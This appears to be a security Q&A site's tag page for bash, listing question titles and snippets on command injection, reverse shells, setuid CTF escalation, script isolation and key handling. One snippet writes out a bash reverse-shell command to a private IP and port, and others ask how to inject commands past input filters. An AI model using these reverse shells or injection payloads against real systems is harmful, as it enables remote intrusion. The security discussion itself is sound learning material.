Questions tagged [bash]
The Bourne-again shell (Bash) is a Unix shell. It lets the user run commands on the host machine as a text-based program. Questions using this tag should be related either to vulnerabilities of Bash or to the proper use of specific commands.
163 questions
5 votes, 3 answers, 1k views
Are these bash lines (handling untrusted user input) vulnerable to command injection?
If $1 contains untrusted user input, for example $(whoami), are any of the following bash examples vulnerable to command injection?
I'm having issues clearly understanding this behavior in Bash. Also, ...
0 votes, 0 answers, 85 views
benefit to reading sensitive file chunks via a "middleman" shell script?
tldr: is using a script spawned by my main process, which reads only a chunk of a sensitive file then passing the result to my main process - of any benefit?
in contrast to loading the file in my ...
3 votes, 2 answers, 312 views
Is this code vulnerable to injection?
I'm reviewing code which apparently ignores all security standards but doesn't seem to be exploitable due to its peculiar construction. The first stage is a Java Spring application and the name ...
0 votes, 0 answers, 43 views
Python os.system() does not change EUID to 0, but os.execl() does, why? [duplicate]
I was working on a Capture the Flag (CTF) challenge that involved a setuid-enabled binary, '/usr/bin/python', where the owner is 'root.' I assumed the user was "www-data", with UID=33.
The ...
0 votes, 0 answers, 321 views
how to exploit read -p in bash script
I wanna execute the ls command in place of the output being "your name is ls".
Is there a way to do it?
read -p "name??" name
echo "your name is $name"
0 votes, 0 answers, 1k views
Bash reverse shell as a URL parameter value
I try to put a bash reverse shell as a URL parameter. The command is as follows:
bash -i >& /dev/tcp/192.168.56.105/4444 0>&1
I have encoded the above code with URL encoding
bash%20-i%20%...
0 votes, 1 answer, 242 views
Auto-opening a reverse bash shell
Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
4 votes, 1 answer, 278 views
GPG allows importing an invalid secp256k1 public key
I came across a PGP public key that seems invalid. The key is a secp256k1 public key, which is supported by GPG. In fact, GPG allows importing that key even if it has an invalid secp256k1 public key inside....
1 vote, 1 answer, 3k views
Doing a diff between two keystore files
I have a keystore file with certificates and I want to compare if the second keystore has exactly the same contents as the first one.
One approach would be to extract the certificates using keytool ...
0 votes, 0 answers, 166 views
How to isolate a bash script process?
I have a bash script that opens various random files that could be anything (PDF, xlsx, MKV, MP4, WebM, html). Since I don't fully trust the source of these files, there is a chance that some of them ...
1 vote, 0 answers, 2k views
How can you perform OS Command Injection when single-quotes are filtered?
While attempting OS Command Injection on a url.com/?ping= parameter, I see that all single quotes ' are being escaped and replaced by \\'.
This is problematic because whenever you submit a value to ?...
-1 votes, 1 answer, 161 views
How I can grep only subdomain names without "target.com" [closed]
I have a wordlist of subdomains that contains entries like this:
admin.bugbountytarget.com
portal.bugbountytarget.com
sales.bugbountytarget.com
vpn1.bugbountytarget.com
dev.test.bugbountytarget.com
...
And I ...
0 votes, 1 answer, 494 views
bash: how to securely source a script from an environment variable
Say I want to do source $VIRTUAL_ENV/bin/activate in my bashrc whenever the VIRTUAL_ENV is defined.
In general, the idea of running a script pointed by an environment variable seems a bit fishy as it ...
1 vote, 1 answer, 224 views
What scenarios does calling `clear` at the end of an ssh session protect against?
I have noticed that some server configurations put a clear command in the default ~/.bash_logout file, also with the comment "Clear the screen for security's sake". I can see that this ...
7 votes, 2 answers, 2k views
/opt and sudo unzip to /opt, is it safe?
Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put ...